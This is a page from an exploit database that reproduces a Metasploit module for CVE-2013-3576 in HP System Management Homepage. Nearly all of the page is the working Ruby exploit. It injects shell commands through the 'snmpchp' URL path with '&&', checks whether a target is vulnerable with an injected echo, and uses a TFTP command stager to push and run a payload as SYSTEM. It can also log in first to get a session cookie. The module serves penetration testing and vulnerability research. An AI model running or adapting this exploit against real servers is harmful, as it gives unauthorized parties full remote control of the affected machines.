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HP System Management Homepage JustGetSNMPQueue Command Injection

🗓️ 26 Jun 2013 00:00:00Reported by RootType 
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HP System Management Homepage command injection vulnerabilit

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                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in HP System Management Homepage.  By
        supplying a specially crafted HTTP request, it is possible to control the
        'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
        which will be used in a exec() function.  This results in arbitrary code execution
        under the context of SYSTEM.  Please note: In order for the exploit to work, the
        victim must enable the 'tftp' command, which is the case by default for systems
        such as Windows XP, 2003, etc.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2013-3576'],
          ['OSVDB', '94191'],
          ['US-CERT-VU', '735364']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 11 2013",
      'DefaultTarget'  => 0))
 
    register_options(
      [
        Opt::RPORT(2381),
        # USERNAME/PASS may not be necessary, because the anonymous access is possible
        OptString.new("USERNAME", [false, 'The username to authenticate as']),
        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
      ], self.class)
  end
 
 
  def peer
    "#{rhost}:#{rport}"
  end
 
 
  def check
    cookie = ''
 
    if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
      cookie = login
      if cookie.empty?
        print_error("#{peer} - Login failed")
        return Exploit::CheckCode::Safe
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end
 
    sig = Rex::Text.rand_text_alpha(10)
    cmd = Rex::Text.uri_encode("echo #{sig}")
    uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
 
    req_opts = {}
    req_opts['uri'] = uri
    if not cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
    end
 
    res = send_request_raw(req_opts)
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end
 
    if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end
 
    Exploit::CheckCode::Safe
  end
 
 
  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
 
    cookie = ''
 
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => '/proxy/ssllogin',
      'vars_post' => {
        'redirecturl'         => '',
        'redirectquerystring' => '',
        'user'                => username,
        'password'            => password
      }
    })
 
    if not res
      fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
    end
 
    # CpqElm-Login: success
    if res.headers['CpqElm-Login'].to_s =~ /success/
      cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
    end
 
    cookie
  end
 
 
  def setup_stager
    execute_cmdstager({ :temp => '.'})
  end
 
 
  def execute_command(cmd, opts={})
    # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
    uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
 
    req_opts = {}
    req_opts['uri'] = uri
    if not @cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
    end
 
    print_status("#{peer} - Executing: #{cmd}")
    res = send_request_raw(req_opts)
  end
 
 
  def exploit
    @cookie = ''
 
    if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
      @cookie = login
      if @cookie.empty?
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end
 
    @uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
    setup_stager
  end
end
                              

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